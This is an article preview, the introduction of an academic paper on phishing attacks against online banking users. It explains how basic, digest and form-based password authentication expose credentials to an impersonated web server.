Article Preview
TopIntroduction
Phishing attacks have become more widespread these days. A study by the Anti-Phising Working Group found that the password stealing malicious code URLs increased from 9529 in June of 2008 to 31173 (more than tripled) in December of 2008 (Anti-phishing Working Group, 2009). Another study showed that phishing cost the U.S. $3.2 billion in 2007 (Hodgin, 2007). Among the victims of phishing attacks, financial institutions are hit hardest. Because of the rising online identity theft caused by phishing attacks and regulators’ concerns, financial institutions are looking for better on-line security tools against phishing attacks (Richmond, 2005).
In a typical phishing attack, a user first receives an email informing him to update his online account (such as an online banking account or an online utility bill account) using an embedded URL. The email also warns that failing to conform would result in account lock-out or deletion. Struck by panic, the user may immediately click on the given link, which would lead the user’s web browser to a web site that bears the right logo and a familiar appearance. The user then hastens to type in his account name and password. But actually that web site is run by an attacker, who now has the information to perform fraudulent transactions in that user’s name. Phishing attacks harvest secret information for client-side authentication by impersonating a web server.
Most of today’s web applications use three methods to authenticate a client, namely, basic authentication, digest authentication, and form-based authentication. (There is a fourth client authentication method on the web, the certificate-based client authentication. In this method, a client is assigned a private key, which is used in the Secure Socket Layer (SSL) protocol for client authentication. This method is not common for home users as it requires a user to manage a random private key and ordinary users lack the expertise to handle a private key correctly.) All these three methods are password-based authentications, in which a client remembers a password and the server stores a related password verification data (PVD). In basic authentication, a client’s password is encoded with the (public) Base64 (Josefsson, 2003) method and sent to the server for verification. In digest authentication, the client’s password is not sent to the server; rather, the server sends a random challenge to the client, who then responds with a value calculated from its password and the challenge value. The server compares the received response value with a value calculated from the challenge and the corresponding PVD. In form-based authentication, a client’s password is encapsulated in a HTML form and then transmitted in HTTP to the server.
Should the web server be impersonated, in basic authentication and form-based authentication, the phony web server will receive the client’s password. If digest authentication is used, the phony web server will not get the password directly but having a (challenge, response) pair will allow it to mount off-line dictionary attacks: a value calculated from a guessed password and the challenge is compared against the received response; this process is repeated until a match is found, indicating that the current guessed password is the correct one.